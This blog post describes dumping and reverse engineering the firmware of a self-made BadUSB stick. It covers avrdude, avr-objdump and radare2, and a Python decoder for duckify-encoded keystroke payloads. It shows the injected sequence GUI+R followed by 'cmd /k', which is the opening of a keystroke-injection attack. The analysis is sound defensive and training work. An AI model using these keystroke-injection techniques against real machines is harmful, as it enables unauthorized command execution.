Introduction
This post is the continuation of How to safely investigate an unknown and potentially malicious USB device [1/3] and From sadusb to badusb. Building an internal SOC exercise [2/3].
After the initial failed attempt at reversing a memory dump, let’s assume I found a malicious USB stick in the parking lot. This time, however, the payload isn’t unknown; it is the one that I crafted myself and explained in the previous post.
Now that we have a real malicious badusb, we can finally analyze it.
Yes, I know it’s cheating, but I don’t care.
Why spend more time on this if I already know what’s inside the stick? Because, why not?
Memory dump
There are many questions on Stack Overflow about whether it’s possible to extract code from an Arduino board or an AVR microcontroller. Since many Arduino boards are based on ATmega microcontrollers, it’s understandable that beginners often run into issues and ask these questions. So it looks like it’s common to flash something and then lose the source code ¯\(ツ)/¯
One of my favorite answers to the question How do I extract code from an arduino? [duplicate] is:
The short answer: You don’t.
With enough know-how, you could probably extract the executable binary from the Arduino, but the source code is not installed on the device. You would need to run a decompiler on the binary. (Or read the machine code directly.) The output of a decompiler is usually pretty ugly however, and will look quite different from the original source-code. It won’t have meaningful variable names, class names, or function names, and the code structure will likely be a little different than the original source code.
All those problems, setbacks, and attempts to demotivate are exactly what I’m looking for :D
But, as we already know, there are different ways to dump memory from the ATtiny. I will use the Arduino as ISP because it’s easier and more reliable. Everything is explained here: Dumping memory, Second attempt: Arduino
Not much more to add here, just clip the chip and fire avrdude.
$ sudo avrdude -v -c avrisp -p t85 -P /dev/ttyACM0 -b 19200 -U flash:r:dump.bin
Inspecting the memory dump
Once we have the memory dump file, we can inspect its contents.
$ xxd dump.bin
00000000: 48c3 6cc3 9ac6 6ac3 22c6 68c3 67c3 66c3 H.l...j.".h.g.f.
00000010: 65c3 64c3 63c3 62c3 61c3 60c3 5fc3 2c5e e.d.c.b.a.`._.,^
00000020: 7460 6162 6434 6667 656e 362d 3738 271e t`abd4fgen6-78'.
00000030: 1f20 2122 2324 2526 7333 762e 7778 5f44 . !"#$%&s3v.wx_D
00000040: 4546 4748 494a 4b4c 4d4e 4f50 5152 5354 EFGHIJKLMNOPQRST
00000050: 5556 5758 595a 5b5c 5d2f 3130 636d 3504 UVWXYZ[\]/10cm5.
00000060: 0506 0708 090a 0b0c 0d0e 0f10 1112 1314 ................
00000070: 1516 1718 191a 1b1c 1d6f 7170 752a 0501 .........oqpu*..
00000080: 0906 a101 0507 19e0 29e7 1500 2501 7501 ........)...%.u.
00000090: 9508 8102 9501 7508 2573 1900 2973 8100 ......u.%s..)s..
000000a0: c012 034b 0065 0079 0062 006f 0061 0072 ...K.e.y.b.o.a.r
000000b0: 0064 0028 0344 0065 006c 006c 0020 0043 .d.(.D.e.l.l. .C
000000c0: 006f 006d 0070 0075 0074 0065 0072 0020 .o.m.p.u.t.e.r.
000000d0: 0043 006f 0072 0070 002e 0004 0309 0409 .C.o.r.p........
000000e0: 0222 0001 0100 8032 0904 0000 0103 0101 .".....2........ ...
This time, we have some interesting data! The keyboard name is easily identifiable near the start of the binary, which looks promising!
It’s the only part that is readable at a glance, which is normal for a raw memory dump.
Running the strings command doesn’t show anything useful:
$ strings dump.bin
,^t`abd4fgen6-78'
!"#$%&s3v.wx_DEFGHIJKLMNOPQRSTUVWXYZ[\]/10cm5
oqpu*
h>s@
/_?O$
&/ R3
M/l/
F/h/
q@d/w
q/wRP ~@/G~T
If the payload contents were shown directly using strings, it would have been too easy.
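A likely reason the keyboard name does not show up in the strings output is that USB string descriptors store their text as UTF-16LE, so every ASCII character is followed by a zero byte (GNU strings can search for that encoding with -e l). The sketch below is only an illustration, assuming the standard descriptor layout (a length byte, the type byte 0x03, then the UTF-16LE text); find_usb_strings is a hypothetical helper, and the sample bytes are copied from offsets 0xa0 to 0xde of the hex dump above.

```python
# Bytes 0xa0..0xde of the dump shown above (two string descriptors + language ID).
SAMPLE = bytes.fromhex(
    "c0"
    "1203 4b00 6500 7900 6200 6f00 6100 7200 6400"
    "2803 4400 6500 6c00 6c00 2000 4300 6f00 6d00 7000 7500"
    "7400 6500 7200 2000 4300 6f00 7200 7000 2e00"
    "0403 0904"
)


def find_usb_strings(data: bytes, min_chars: int = 2):
    """Scan for USB string descriptors: [bLength][0x03][UTF-16LE text]."""
    found = []
    i = 0
    while i + 2 <= len(data):
        length = data[i]
        looks_like_descriptor = (
            data[i + 1] == 0x03              # bDescriptorType == STRING
            and length % 2 == 0              # header (2) + 2 bytes per char
            and length >= 2 + 2 * min_chars
            and i + length <= len(data)
        )
        if looks_like_descriptor:
            text = data[i + 2:i + length].decode("utf-16-le", errors="replace")
            # Keep only candidates made of printable ASCII characters.
            if all(32 <= ord(ch) < 127 for ch in text):
                found.append((i, text))
                i += length
                continue
        i += 1
    return found


for offset, text in find_usb_strings(SAMPLE):
    print(f"{offset:#x}: {text}")
```

The heuristic is deliberately strict (printable ASCII only), so it can miss descriptors in other languages; on a full dump it may also report false positives that happen to match the pattern.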
To get more information, we’ll need to use a disassembler to recover the assembly code.
Disassembly
A disassembler is a computer program that translates machine language into assembly language.
avr-objdump is a utility that is part of the AVR-GCC toolset, used for developing software for AVR microcontrollers. It is a version of the GNU objdump program tailored specifically for the AVR architecture.
The input file should be in Intel Hex format. To convert from binary to ihex or vice-versa, we can use the avr-objcopy utility.
avr-objcopy -I ihex dump.hex -O binary dump.bin
avr-objcopy -I binary dump.bin -O ihex dump.hex
Some useful options of avr-objdump include:
-x, --all-headers Display the contents of all headers
-d, --disassemble Display assembler contents of executable sections
-D, --disassemble-all Display assembler contents of all sections
-S, --source Intermix source code with disassembly
-s, --full-contents Display the full contents of all sections requested
-m, --architecture=MACHINE Specify the target architecture as MACHINE
The MACHINE architecture can be found on nongnu.org. For the ATtiny85, it corresponds to avr2/avr25.
Using these utilities, we can get the disassembly, though it’s a bit rudimentary.
$ avr-objcopy -I binary dump.bin -O ihex dump.hex
$ avr-objdump -m avr25 -xD dump.hex
dump.hex: file format ihex
dump.hex
architecture: UNKNOWN!, flags 0x00000000:
start address 0x00000000
Sections:
Idx Name Size VMA LMA File off Algn
0 .sec1 000011aa 00000000 00000000 00000000 2**0
CONTENTS, ALLOC, LOAD
SYMBOL TABLE:
no symbols
Disassembly of section .sec1:
00000000 <.sec1>:
0: 48 c3 rjmp .+1680 ; 0x692
2: 6c c3 rjmp .+1752 ; 0x6dc
4: 9a c6 rjmp .+3380 ; 0xd3a
6: 6a c3 rjmp .+1748 ; 0x6dc
8: 22 c6 rjmp .+3140 ; 0xc4e
a: 68 c3 rjmp .+1744 ; 0x6dc
c: 67 c3 rjmp .+1742 ; 0x6dc
e: 66 c3 rjmp .+1740 ; 0x6dc
10: 65 c3 rjmp .+1738 ; 0x6dc
12: 64 c3 rjmp .+1736 ; 0x6dc
14: 63 c3 rjmp .+1734 ; 0x6dc
16: 62 c3 rjmp .+1732 ; 0x6dc
18: 61 c3 rjmp .+1730 ; 0x6dc
1a: 60 c3 rjmp .+1728 ; 0x6dc
1c: 5f c3 rjmp .+1726 ; 0x6dc
1e: 2c 5e subi r18, 0xEC ; 236
20: 74 60 ori r23, 0x04 ; 4
22: 61 62 ori r22, 0x21 ; 33
24: 64 34 cpi r22, 0x44 ; 68
26: 66 67 ori r22, 0x76 ; 118
28: 65 6e ori r22, 0xE5 ; 229
2a: 36 2d mov r19, r6
2c: 37 38 cpi r19, 0x87 ; 135
2e: 27 1e adc r2, r23
30: 1f 20 and r1, r15
32: 21 22 and r2, r17 ...
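As a cross-check of the vector table above, the rjmp targets can be recomputed by hand. This is a minimal sketch, assuming the RJMP encoding described in the AVR Instruction Set Manual (1100 kkkk kkkk kkkk, where k is a signed 12-bit offset in words relative to the next instruction); decode_rjmp is a hypothetical helper, and the bytes are the first five vectors of the dump.

```python
from typing import Optional


def decode_rjmp(opcode: int, address: int) -> Optional[int]:
    """Return the byte address an RJMP located at `address` jumps to."""
    if opcode & 0xF000 != 0xC000:
        return None                 # not an RJMP instruction
    k = opcode & 0x0FFF             # 12-bit word offset
    if k & 0x800:                   # sign-extend negative offsets
        k -= 0x1000
    # PC <- PC + k + 1 (in words); one word is two bytes.
    return address + 2 + 2 * k


VECTORS = bytes.fromhex("48c3 6cc3 9ac6 6ac3 22c6")

targets = []
for addr in range(0, len(VECTORS), 2):
    # AVR opcodes are stored little-endian: bytes "48 c3" are opcode 0xc348.
    opcode = int.from_bytes(VECTORS[addr:addr + 2], "little")
    targets.append(decode_rjmp(opcode, addr))

print([hex(t) for t in targets])
```

The first vector (reset) lands on 0x692 and most of the others share 0x6dc, which matches the avr-objdump comments.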
avr-objdump is simple and easy to use, but it’s not the best tool for reverse engineering a full firmware.
There are other similar alternatives like vAVRdisasm, AVRDisassembler, or avrdisas, but they are a bit old and have basic features too.
Other advanced disassembler and decompiler alternatives that support AVR include Ghidra, IDA Pro, Binary Ninja, and Hopper. However, radare2 is my favorite <3
Learning AVR
Now that we have a memory dump and we can read assembly code, it’s time to learn a bit more about AVR Assembly to understand what is going on.
Introduction to AVR assembly
AVR assembly language is a low-level language specific to the AVR family of microcontrollers. Understanding AVR assembly requires familiarity with its instruction set and architecture.
Here are some basics to get started:
Memory: The memory in AVR microcontrollers includes Flash memory for storing the program, SRAM for data, and EEPROM for non-volatile data storage. More information about the memory map can be found in a previous blog post.
Registers: AVR microcontrollers have 32 general-purpose working registers, named R0 to R31. Additionally, there are special-purpose double registers like X (R26,R27), Y (R28,R29), and Z (R30,R31), which are used for memory addressing operations.
Useful resources
AVR® Instruction Set Manual: The AVR® Instruction Set Manual from Microchip is the official document detailing each instruction. However, it can be dense and challenging to read straight through. It’s useful for looking up specific instructions or clarifying doubts.
Hackaday Course: The AVR: Architecture, Assembly & Reverse Engineering course by Uri Shaked and Hackaday is extremely useful to understand low level AVR. It’s a full course covering very interesting topics about AVR and practical reverse engineering techniques.
Understanding instructions
Learning common instructions is crucial for understanding AVR assembly. Here are a couple examples of how instructions are documented in the datasheet:
- LDI (Load Immediate): Loads an 8-bit constant directly to a register.
- OUT (Output): Transfers data from a register to an I/O location.
By familiarizing ourselves with these instructions and registers, we can begin to piece together what the assembly code is doing.
Understanding AVR assembly takes time and practice. My approach was to dive straight into the assembly code and refer to the documentation as needed. Over time, you’ll start to recognize and understand more parts of the code.
Reversing with radare2
Entrypoint and bootloaders
After the initial analysis with aaa, we can find basic information about the memory dump:
The entrypoint is detected at 0x00692
The keyboard type is easily found by searching for strings, but the full payload is encoded inside the binary data.
Looking at the graph of the entrypoint function, we can see a more or less familiar structure.
The LiveOverflow video Identify Bootloader main() and find Button Press Handler - Hardware Wallet Research #5 is an excellent resource showing a similar initialization routine.
It’s practically the same RAM initialization routine, or bootloader initialization:
- Copy static data from ROM to RAM (RAM is empty on startup)
- Clear the rest of RAM
- Call the main() function
We flashed our code directly using avrdude without specifying the bootloader, and a minimal initialization is what we see at entry0.
Following the graph, we can find the main function (renamed by me):
Main function
The main function is quite large and can be summarized into two different parts.
First part
The first part is a hardware initialization, using I/O registers. Radare2 helps a lot with annotations.
I/O registers in AVR are special memory locations used to control hardware peripherals like timers, counters, serial ports, and other internal components. Each I/O register is associated with a specific function or hardware feature.
There are a lot of in, out, andi, and ori instructions, used to configure these registers.
- in: Load an I/O Location to Register. Loads data from the I/O Space (Ports, Timers, Configuration Registers, etc.) into register Rd in the Register File.
- out: Store Register to I/O Location. Stores data from register Rr in the Register File to I/O Space (Ports, Timers, Configuration Registers, etc.).
- andi: Logical AND with Immediate. Performs the logical AND between the contents of register Rd and a constant, and places the result in the destination register Rd.
- ori: Logical OR with Immediate. Performs the logical OR between the contents of register Rd and a constant, and places the result in the destination register Rd.
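These four instructions usually appear together as a read-modify-write sequence: read the I/O register, set or clear a few bits, write it back. The toy model below only illustrates that pattern; io_space, the address 0x17, and the helper names are assumptions made up for the example and do not come from the firmware.

```python
# Toy I/O space: address -> 8-bit value (contents are hypothetical).
io_space = {0x17: 0b0000_0001}


def io_in(addr: int) -> int:
    """Model of `in Rd, addr`: read an I/O location."""
    return io_space.get(addr, 0)


def io_out(addr: int, value: int) -> None:
    """Model of `out addr, Rr`: write an 8-bit value to an I/O location."""
    io_space[addr] = value & 0xFF


def set_bits(addr: int, mask: int) -> None:
    # in r24, addr ; ori r24, mask ; out addr, r24
    io_out(addr, io_in(addr) | mask)


def clear_bits(addr: int, mask: int) -> None:
    # in r24, addr ; andi r24, ~mask ; out addr, r24
    io_out(addr, io_in(addr) & (~mask & 0xFF))


set_bits(0x17, 0b0000_0010)     # turn bit 1 on, leave the rest untouched
after_set = io_in(0x17)
clear_bits(0x17, 0b0000_0001)   # turn bit 0 off
after_clear = io_in(0x17)
print(bin(after_set), bin(after_clear))
```

Spotting an in / ori / out or in / andi / out triplet in the disassembly is a good hint that a single configuration bit is being toggled.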
Second part
The second part of the main function contains the actual code that calls a lot of different functions, and also runs inside a loop.
By comparing the main function from the disassembly with the source code, and renaming some functions for clarity, we can see a clear correlation between them.
We can also verify that the arguments match between the assembly and the source code.
For example, the digi.delay function arguments can be compared: delay(5000) in the source code is confirmed by the assembly:
[0x00000f7c]> ? 0x88~bin
binary 0b10001000
[0x00000f7c]> ? 0x13~bin
binary 0b00010011
[0x00000f7c]> ? 0b0001001110001000~int
int32 5000
Similarly, delay(1000) is confirmed as well:
[0x00000f7c]> ? 0xe8~bin
binary 0b11101000
[0x00000f7c]> ? 0x03~bin
binary 0b00000011
[0x00000f7c]> ? 0b0000001111101000~int
int32 1000
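The same check can be done without concatenating binary strings by hand. AVR registers are 8 bits wide, so a 16-bit argument is split into a low and a high byte; the sketch below simply joins them again (join_bytes is a hypothetical helper name).

```python
def join_bytes(low: int, high: int) -> int:
    """Rebuild a 16-bit value from its low and high bytes."""
    return (high << 8) | low


print(join_bytes(0x88, 0x13))   # bytes seen for delay(5000)
print(join_bytes(0xE8, 0x03))   # bytes seen for delay(1000)

# Equivalent, using the little-endian byte order of the value:
print(int.from_bytes(bytes([0x88, 0x13]), "little"))
```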
The arguments for the sendKeyStroke() function also match:
[0x00000f7c]> ? 0x15~int
int32 21
[0x00000f7c]> ? 0x08~int
int32 8
DigiKeyboard.sendKeyStroke(21, 8); // GUI R
The duckyString() function has two arguments: the pointer to the encoded keys and the length.
duckyString(key_cmd, sizeof(key_cmd)); // STRING cmd /k
The disassembly shows the two arguments (r22+r23 and r24+r25):
We can validate that the size is 12 and the contents are at address 0x675.
>>> 0x0c
12
>>> f'0x{0x06:x}{0x75:x}'
'0x675'
Examining 12 bytes starting at this memory address in radare:
And the original values in the source code were:
// cmd /k
const uint8_t key_cmd[] PROGMEM = {0,6, 0,16, 0,7, 0,44, 0,56, 0,14};
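Those twelve bytes can already be decoded by hand. The sketch below assumes the standard USB HID usage IDs for a US layout (letters a to z are 0x04 to 0x1d, space is 0x2c, slash is 0x38); HID_US is a tiny hypothetical table that only covers what this string needs, and anything with a modifier is shown as "?".

```python
# Minimal US-layout table: HID usage ID -> character.
HID_US = {4 + i: chr(ord("a") + i) for i in range(26)}
HID_US.update({0x2C: " ", 0x38: "/"})

key_cmd = [0, 6, 0, 16, 0, 7, 0, 44, 0, 56, 0, 14]


def decode_pairs(values):
    """Decode (modifier, key) pairs; unknown or modified keys become '?'."""
    decoded = []
    for mod, code in zip(values[0::2], values[1::2]):
        if mod == 0 and code in HID_US:
            decoded.append(HID_US[code])
        else:
            decoded.append("?")
    return "".join(decoded)


print(decode_pairs(key_cmd))
```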
Everything is starting to make sense!
At this point, we have identified the initialization routine or bootloader, the main loop function, and all the important functions and arguments at a high level. We have also learned that the payload to be injected is somewhere in memory and can be found, read, and decoded.
Let’s continue our reversing process to retrieve all the decoded values.
Decode payload bytes
In my exercise I used the BadUSB converter tool duckify.huhn.me to build the sketches with my ducky script payloads. This webapp tool is based on the code from duckify. By examining the source code, I found that it relies on various mappings and JSON files containing the values for each character corresponding to different languages and operating systems.
To reverse-engineer the values, the idea was to guess the keyboard language and operating system, and then refer to the relevant json file for the corresponding values.
However, it was a bit more complicated than anticipated.
Reviewing duckify’s source code
The possible key mappings are defined in json files within a library folder. The conversion of these mappings is handled in arduinoConverter.js.
The conversion works by reading lines of the Ducky Script and processing them based on the verb (REM, STRING, DELAY, etc.). The STRING verbs, which contain the payloads to be automatically injected, are particularly interesting. The main code that handles STRING lines is:
...
// STRING
else if (line.startsWith('STRING ')) {
  const i = keyArrays.length
  const value = line.substring(7)
  const comment = commentEscape(value)
  const shortComment = commentCut(value)
  addCodeLine(`duckyString(key_arr_${i}, sizeof(key_arr_${i})); // STRING ${shortComment}`)
  keyArrays.push({
    comment: comment,
    value: encodeString(value, layout, i),
  })
}
...
The function that encodes the line is as follows:
encodeString(value, layout, i)
The layout used for encoding is one of the options listed here:
import win_be from './win/be.json'
import win_bg from './win/bg.json'
import win_cacms from './win/ca-cms.json'
import win_cafr from './win/ca-fr.json'
import win_chde from './win/ch-de.json'
...
Each layout is a json file with entries like this:
{
"char": "a",
"code": "KeyA",
"alt": false,
"altGr": false,
"shift": false,
"us": "a",
"combo": "",
"comboAlt": false,
"comboAltGr": false,
"comboShift": false
}
The encodeString function processes each character of the line and encodes it using the following logic:
for (const char of str) {
  const key = layout.find(key => key.char === char)
  const value = getKeyValue(key ? key.us : char)
  const modValue = key ? getModValue(key) : 0x00
  if (value === 0) {
    console.log(`Couldn't find value for ${char}`, key)
  }
  if (key && key.combo !== '') {
    const comboModValue = getComboModValue(key)
    const comboValue = getKeyValue(key.combo)
    output += `${comboModValue.toString()},${comboValue.toString()}, `
  }
  output += `${modValue.toString()},${value.toString()}, `
}
- Find the Key in the layout json file.
const key = layout.find(key => key.char === char)
- Get the Key Value using charMap, a map giving a value to each key.
const value = getKeyValue(key ? key.us : char)
Ternary operator: (condition) ? "value if True" : "value if False"
const getKeyValue = (key) => {
return charMap[key] | 0x00
}
const charMap = {
'a': 0x04,
'b': 0x05,
'c': 0x06,
...
'1': 0x1e,
'2': 0x1f,
...
' ': 0x2c,
'-': 0x2d,
'=': 0x2e,
...
// Extras
'\n': 0x28, // ENTER
'Space': 0x2c, // SPACE
...
}
- Get modValue, special key combinations.
const getModValue = (key) => {
let value = 0x00
if (key.shift) value |= modMap['LSHIFT']
if (key.alt) value |= modMap['LALT']
if (key.altGr) value |= modMap['RALT']
return value
}
If any of the key attributes is present, it does a bitwise OR (|=) against value using the modMap mapping with the following values:
const modMap = {
'LSHIFT': 0x02,
'LALT': 0x04,
'RALT': 0x40,
...
}
Essentially, it packs the modifier options into a single byte as a bitmask.
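Since each modifier owns one bit, the byte can be built and taken apart again without ambiguity. A minimal sketch, reusing only the three modMap values shown above (pack_mods and unpack_mods are hypothetical helper names):

```python
MOD_MAP = {"LSHIFT": 0x02, "LALT": 0x04, "RALT": 0x40}


def pack_mods(*names: str) -> int:
    """OR the bits of the given modifiers into a single byte."""
    value = 0x00
    for name in names:
        value |= MOD_MAP[name]
    return value


def unpack_mods(value: int) -> list:
    """List the modifiers whose bit is set in `value`."""
    return [name for name, bit in MOD_MAP.items() if value & bit]


packed = pack_mods("LSHIFT", "RALT")
print(hex(packed), unpack_mods(packed))
```

This reversibility is what makes it possible to recover shift, alt and altGr from the first byte of every pair found in the dump.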
- Process Combos, multiple keys pressed.
At this point we already have the key and keymod, but some chars are encoded using more than one key press, and are defined as combos.
If we found a valid value, and the key contains a valid key.combo, we continue to get the comboModValue the same way as before, as well as the comboValue:
const comboModValue = getComboModValue(key)
const comboValue = getKeyValue(key.combo)
const getComboModValue = (key) => {
let value = 0x00
if (key.comboAlt) value |= modMap['LALT']
if (key.comboAltGr) value |= modMap['RALT']
if (key.comboShift) value |= modMap['LSHIFT']
return value
}
- Add key results to Output
output += `${comboModValue.toString()},${comboValue.toString()}, `
...
output += `${modValue.toString()},${value.toString()}, `
For example, encoding the character “à” with the es layout might result in:
{0,47, 0,4}
But that is not a possible value using the us layout and will be represented as:
{0,0}
The key.combo and key.char values could overlap, making it challenging to distinguish between comboModValue/comboValue and modValue/value.
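To see the whole encoding path in one place, here is a rough Python port of the JavaScript logic above. It is a sketch under assumptions: CHAR_MAP is trimmed to two entries, and ES_SAMPLE is a hypothetical one-entry layout written to reproduce the {0,47, 0,4} example; the real es.json entry for “à” may look different.

```python
CHAR_MAP = {"a": 0x04, "[": 0x2F}   # trimmed charMap (USB HID usage IDs)
MOD_MAP = {"LSHIFT": 0x02, "LALT": 0x04, "RALT": 0x40}

# Hypothetical layout entry: "à" typed as a dead key followed by "a".
ES_SAMPLE = [{
    "char": "à", "us": "a", "alt": False, "altGr": False, "shift": False,
    "combo": "[", "comboAlt": False, "comboAltGr": False, "comboShift": False,
}]


def mod_value(key, shift, alt, alt_gr):
    """OR together the modifier bits selected by the given attribute names."""
    value = 0x00
    if key[shift]:
        value |= MOD_MAP["LSHIFT"]
    if key[alt]:
        value |= MOD_MAP["LALT"]
    if key[alt_gr]:
        value |= MOD_MAP["RALT"]
    return value


def encode_string(text, layout):
    """Return a flat list of (modifier, key) pairs for `text`."""
    output = []
    for char in text:
        key = next((k for k in layout if k["char"] == char), None)
        value = CHAR_MAP.get(key["us"] if key else char, 0)
        mod = mod_value(key, "shift", "alt", "altGr") if key else 0x00
        if key and key["combo"] != "":
            combo_mod = mod_value(key, "comboShift", "comboAlt", "comboAltGr")
            output += [combo_mod, CHAR_MAP.get(key["combo"], 0)]
        output += [mod, value]
    return output


print(encode_string("à", ES_SAMPLE))   # combo pair first, then the key pair
print(encode_string("à", []))          # no layout entry and no charMap value
```

The second call shows why unsupported characters end up as a {0,0} pair: neither the layout nor the charMap knows the character, so both bytes stay at zero.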
Decoding the values by manually inspecting the mappings is complex. Therefore, automating the process is a practical solution. It’s nice to find an excuse for spending some time automating stuff.
Automating the decoding process
Each key pressed is represented by a pair of values because some characters require multiple special keys to be pressed simultaneously. For instance, a capital A is sent using the combination SHIFT + a.
If a character needs another key pressed first, it becomes a combo, resulting in two pairs of values (for example, à is equal to ` + a in some layouts).
To automate the decoding process, I wrote a Python script.
First, let’s define a class representing the key with all possible attributes:
class Key:
    def __init__(self) -> None:
        self.key_mod = 0
        self.key_mod_values = []
        self.key = 0
        self.key_values = []
        self.char = ""
        self.alt = False
        self.altGr = False
        self.shift = False
        self.us = ""
        self.combo = ""
        self.comboAlt = False
        self.comboAltGr = False
        self.comboShift = False
For testing, we will use the following values:
line = b"\x00\x06\x00\x10\x00\x07\x00\x2c\x00\x38\x00\x0e"
Before starting the decoding, we need to guess the layout and system. The best way to use the same values as the encoding process is to copy the full library folder and search from there:
import json
import logging
import os
from pathlib import Path

def get_possible_layouts():
    possible_layouts = set()
    for _, _, file_names in os.walk(Path(__file__).parent.resolve().joinpath("library")):
        for file_name in file_names:
            if file_name.endswith(".json"):
                possible_layouts.add(file_name.split(".")[0])
    return list(possible_layouts)

def load_layout(system, layout):
    try:
        with open(Path(__file__).parent.resolve().joinpath(f"library/{system}/{layout}.json")) as f:
            return json.load(f)
    except Exception:
        logging.exception("Error loading layout")
        exit()
The main function iterates through the bytes of the string and decodes them pair by pair.
The basic reverse process is to check whether the current pair is a combo and then try to load the next pair to verify whether the combination is valid. If not, it will try to reverse a normal key. If something goes wrong, it will ignore the error and just continue with the next position.
def extract_string(line, layout):
    decoded = ""
    offset = 0
    for i in range(0, len(line), 1):
        i += offset
        try:
            _combo_key = reverse_combo(line[i], line[i+1], layout)
        except IndexError:
            continue
        if _combo_key:
            # check if next key can be combo-ed
            try:
                _k = reverse_combo_key(line[i+2], line[i+3], layout, _combo_key)
                if _k:
                    # combo key success
                    logging.debug(_k)
                    decoded += _k.char
                    offset += 3
                    continue
            except IndexError:
                continue
        try:
            _k = reverse_key(line[i], line[i+1], layout)
        except IndexError:
            continue
        if _k == False:
            continue
        logging.debug(_k)
        decoded += _k.char
        offset += 1
    logging.info(decoded)
The reverse_combo, reverse_combo_key, and reverse_key functions are very similar, and decode pairs of values. The layout argument is the loaded json file with all the keys.
def reverse_key(key_mod, key, layout) -> Key:
    # assume no previous combo key was found
    _k = Key()
    _k.key_mod = key_mod
    _k.key = key
    _k.key_values = [k for k, v in maps.charMap.items() if v == _k.key]
    if len(_k.key_values) == 1:
        _k.us = _k.key_values[0]
        _k.key_mod_values = [k for k, v in maps.modMap.items() if v == (_k.key_mod & v)]
        _k.reverse_key_mod()
        possible_char = list(
            filter(
                lambda x: all(
                    [
                        x["us"] == _k.us,
                        x["shift"] == _k.shift,
                        x["alt"] == _k.alt,
                        x["altGr"] == _k.altGr,
                        x["combo"] == _k.combo,
                        x["comboShift"] == _k.comboShift,
                        x["comboAlt"] == _k.comboAlt,
                        x["comboAltGr"] == _k.comboAltGr,
                    ]
                ),
                layout.get("keys", []),
            )
        )
        if len(possible_char) == 1:
            _k.char = possible_char[0].get("char")
            logging.debug(f"key found! \n{_k}")
            return _k
        elif len(possible_char) > 1:
            logging.warning(f"Multiple char found for this key! {possible_char}")
            logging.warning(_k)
            return False
        else:
            return False
    elif len(_k.key_values) > 1:
        # edge case: space value is duplicated in charMap
        if " " in _k.key_values and "Space" in _k.key_values:
            # ignore key_mod
            _k.char = " "
            _k.us = " "
            return _k
        else:
            return False
    else:
        return False
To reverse the encoding process, we need to invert the bitwise OR. I wrote some small methods in the Key object to retrieve the information by just using _k.reverse_key_mod().
    def reverse_key_mod(self) -> None:
        if "LSHIFT" in self.key_mod_values:
            self.shift = True
        if "LALT" in self.key_mod_values:
            self.alt = True
        if "RALT" in self.key_mod_values:
            self.altGr = True

    def reverse_key_mod_combo(self) -> None:
        if "LSHIFT" in self.key_mod_values:
            self.comboShift = True
        if "LALT" in self.key_mod_values:
            self.comboAlt = True
        if "RALT" in self.key_mod_values:
            self.comboAltGr = True
With all that information gathered from the mapping, the final step is to filter the chosen layout for a key that matches all those properties.
A special case is the space key (0x2c) because it is the only duplicated value in the charMap. If the length of _k.key_values is greater than 1, a space is assumed.
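The duplicate is easy to spot by inverting the map and looking for codes with more than one name. A small sketch, using only a handful of charMap entries quoted earlier in this post (so it illustrates the check rather than proving that space is the only duplicate in the full map):

```python
from collections import defaultdict

# Excerpt of charMap; the real map contains many more entries.
CHAR_MAP = {"a": 0x04, "b": 0x05, "c": 0x06, " ": 0x2C, "Space": 0x2C, "\n": 0x28}

# Invert the map: key code -> every name that produces it.
reverse_map = defaultdict(list)
for name, code in CHAR_MAP.items():
    reverse_map[code].append(name)

duplicates = {code: names for code, names in reverse_map.items() if len(names) > 1}
print(duplicates)
```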
We can now test the script with our sample string (line = b"\x00\x06\x00\x10\x00\x07\x00\x2c\x00\x38\x00\x0e"):
$ python3 test_unduckify.py --layout us --system win
INFO: cmd /k
The simple test works well :)
Automating the extraction with r2pipe
Now that we have a working prototype for decoding the payload, we can use it to analyze a memory dump programmatically with r2pipe. This tool allows us to interact with radare2 directly from the Python script.
The first step is to load the binary and analyze it. We also get the binary size and a list of all the detected functions.
# load binary
binary_file = Path(__file__).parent.resolve().joinpath(args.file)
try:
    r = r2pipe.open(str(binary_file))
except Exception:
    exit()
else:
    logging.info(f"Binary loaded: {str(binary_file)}")

# analyze binary: get binary size and functions
r.cmdj("aaa")
binary_size = r.cmdj("ij").get("core", {}).get("size")
functions = r.cmdj("aflj")
We need the binary_size to iterate over the memory dump byte by byte.
If radare2 has detected a function at a certain location, we can ignore that section of the memory as it doesn’t contain the data we are looking for.
...
for i in range(0, binary_size, 1):
    ...
    # ignore memory that is part of a function
    for f in functions:
        if f.get("offset") <= i < f.get("offset") + f.get("realsz"):
            break
    ...
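The range check can be tried in isolation without radare2. In the sketch below, FUNCTIONS is a hypothetical stand-in for the list returned by aflj (only the offset and realsz fields used above are modelled, and the sizes are invented), and in_function is a helper name introduced for the example.

```python
# Hypothetical excerpt of an `aflj` result: start offset and size in bytes.
FUNCTIONS = [
    {"offset": 0x692, "realsz": 74},
    {"offset": 0xC4E, "realsz": 236},
]


def in_function(offset: int, functions) -> bool:
    """True if `offset` falls inside any detected function."""
    return any(
        f["offset"] <= offset < f["offset"] + f["realsz"] for f in functions
    )


# Only offsets outside every function are candidates for payload data.
data_offsets = [i for i in range(0x690, 0x696) if not in_function(i, FUNCTIONS)]
print([hex(i) for i in data_offsets])
```

With these made-up sizes, 0x675 (where key_cmd was found) is treated as data, while everything from 0x692 onwards is skipped as code.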
At this point, we already have the basic structure of the program. The only remaining task is reading the bytes from the binary. Using the following command, we can read (in json format) 4 bytes at the current offset in our iteration. We need two pairs of values to check if there is a combo key.
ex = r.cmdj(f"pxj 4 @ {i}")
The final part of the script uses the same functions explained before to reverse the bytes (reverse_combo, reverse_combo_key, and reverse_key).
As we iterate over a large binary without knowing its contents, it’s normal to encounter a lot of irrelevant or junk bytes. If any error occurs, we simply ignore the byte and continue.
Packaging and time of truth
The script has grown considerably, and I decided to build it into a package.
It’s called unduckify and the source code can be found here
Usage:
$ unduckify --help
usage: unduckify [-h] (-f FILE | -t TEST) [-l {si,es-la,be,ie,ca-cms,gb,no,sk,ch-fr,bg,is,lt,cz,ca-fr,pt-br,ua,ro,tr,nl,hu,us,ru,ch-de,se,es,it,fi,fr,in,lv,ee,de,pl,dk,gr,hr,pt}]
[-s {win,mac}] [-v]
options:
-h, --help show this help message and exit
-f FILE, --file FILE
-t TEST, --test TEST Provide a value list to test. Example: "0,6, 0,16, 0,7, 0,44, 2,36, 0,14"
-l {si,es-la,be,ie,ca-cms,gb,no,sk,ch-fr,bg,is,lt,cz,ca-fr,pt-br,ua,ro,tr,nl,hu,us,ru,ch-de,se,es,it,fi,fr,in,lv,ee,de,pl,dk,gr,hr,pt}, --layout {si,es-la,be,ie,ca-cms,gb,no,sk,ch-fr,bg,is,lt,cz,ca-fr,pt-br,ua,ro,tr,nl,hu,us,ru,ch-de,se,es,it,fi,fr,in,lv,ee,de,pl,dk,gr,hr,pt}
-s {win,mac}, --system {win,mac}
-v, --verbose
Example using test values:
$ unduckify -t "0,6, 0,16, 0,7, 0,44, 2,36, 0,14" -l es -s win -v
